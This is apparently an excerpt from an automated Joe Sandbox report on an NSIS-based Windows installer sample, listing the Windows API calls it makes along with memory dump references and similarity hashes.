                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                      • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                      • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                      • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                      • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2667972263-0
                                                                                                                      • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                      • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                      • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                      • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                      APIs
                                                                                                                      • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                      • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                      • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                      • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                      • String ID: *?|<>/":
                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                      • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                      • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                      • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                      • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                      APIs
                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                        • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                        • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                        • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1941528284-0
                                                                                                                      • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                      • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                      • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                      • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1912718029-0
                                                                                                                      • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                      • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                      • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                      • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1849352358-0
                                                                                                                      • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                      • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                      • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                      • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3808545654-0
                                                                                                                      • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                      • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                      • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                      • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                      • wsprintfW.USER32 ref: 00404A1A
                                                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                      • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                      • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                      • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                      • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: !
                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                      • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                      • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                      • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                      • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                      • wsprintfW.USER32 ref: 00406411
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                      • String ID: %s%S.dll
                                                                                                                      • API String ID: 2200240437-2744773210
                                                                                                                      • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                      • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                      • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                      • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                      • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1356686001-0
                                                                                                                      • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                      • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                      • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                      • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                        • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                        • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                        • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                        • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3585118688-0
                                                                                                                      • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                      • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                      • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                      • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                      • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                      • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3449924974-0
                                                                                                                      • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                      • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                      • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                      • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2102729457-0
                                                                                                                      • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                      • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                      • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                      • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                        • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                      • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                      • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                      • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                      • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                      • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
